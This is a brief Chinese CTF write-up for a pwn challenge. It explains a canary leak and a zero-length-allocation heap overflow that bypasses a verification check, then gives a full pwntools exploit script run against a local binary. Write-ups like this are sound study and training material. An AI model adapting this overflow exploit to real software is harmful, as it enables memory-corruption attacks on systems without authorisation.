太忙了,下午4点才开始做,,剩下的以后补上
签个到
逻辑很简单两个功能的堆,一个就是申请heap、还有一个是检验如果校验通过就会得到flag
申请模块
中间0x886是个很恶心的东西,需要我们绕过。
这个可以用len为0造成堆溢出来绕过
这里只需要将heap内容的前8位设置成canary即可,并且输入的data需要和heap+4到heap+12地方的内容都一样,一样也是可以绕过的
exp:
#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
#from LibcSearcher import *
context.os = 'linux'
context.log_level = "debug"
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
context.arch = 'amd64'
p = process('./pwn_5')
elf = ELF('./pwn_5')
#libc = ELF('./libc.so.6')
def debug():
gdb.attach(p)
pause()
def add(lent,name):
sla('> ',1)
sla('power length: ',lent)
p.sendlineafter('name: ',name)
def pwn():
sa('who are u?\n','a'*9)
ru('a'*9)
canary = uu64(r(7))*0x100
leak('canary',canary)
add(0,b'a'*0x14+p64(0x0000000000020d51)+p64(canary)+b"aaaa")
print(hex(canary//0x100000000))
add(0x10,p32(canary//0x100000000)+p32(canary//0x100000000))
sla('> ',2)
#debug()
p.sendlineafter('data: ',p32(canary//0x100000000)+p32(canary//0x100000000))
itr()
if __name__ == '__main__':
pwn()